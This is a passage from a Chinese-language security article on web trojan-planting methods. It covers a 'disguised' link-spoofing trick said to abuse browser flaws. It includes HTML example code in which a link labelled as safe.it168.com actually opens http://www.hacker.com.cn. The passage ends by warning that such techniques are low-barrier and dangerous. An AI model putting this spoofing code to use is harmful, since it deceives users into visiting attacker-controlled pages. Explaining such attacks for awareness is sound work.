5、伪装挂马
    高级欺骗，黑客利用IE或者Fixfox浏览器的设计缺陷制造的一种高级欺骗技术，当用户访问木马页面时地址栏显示www.sina.com或者security.ctocio.com.cn等用户信任地址，其实却打开了被挂马的页面，从而实现欺骗，示例代码如：

    <p><a id="qipian" href="http://www.hacker.com.cn"></a></p>
    <div>
    <a href="http://safe.it168.com" target="_blank">
    <table>
    <caption>
    <label for="qipian">
    <u style="cursor;pointer;color;blue">
    safe.it168.com IT168安全版块
    </u>
    </label>
    </caption>
    </table>
    </a>
    </div>
    上面的代码的效果，在貌似http://safe.it168.com的链接如图6上点击却打开了http://www.hacker.com.cn，如图7。（图6）（图7）

    总结：上述的挂马方式都是利用了系统的漏洞，并且挂马的代码不用攻击者编写，都是实现了工具化、傻瓜化。技术门槛比较低，因此危害也特别大。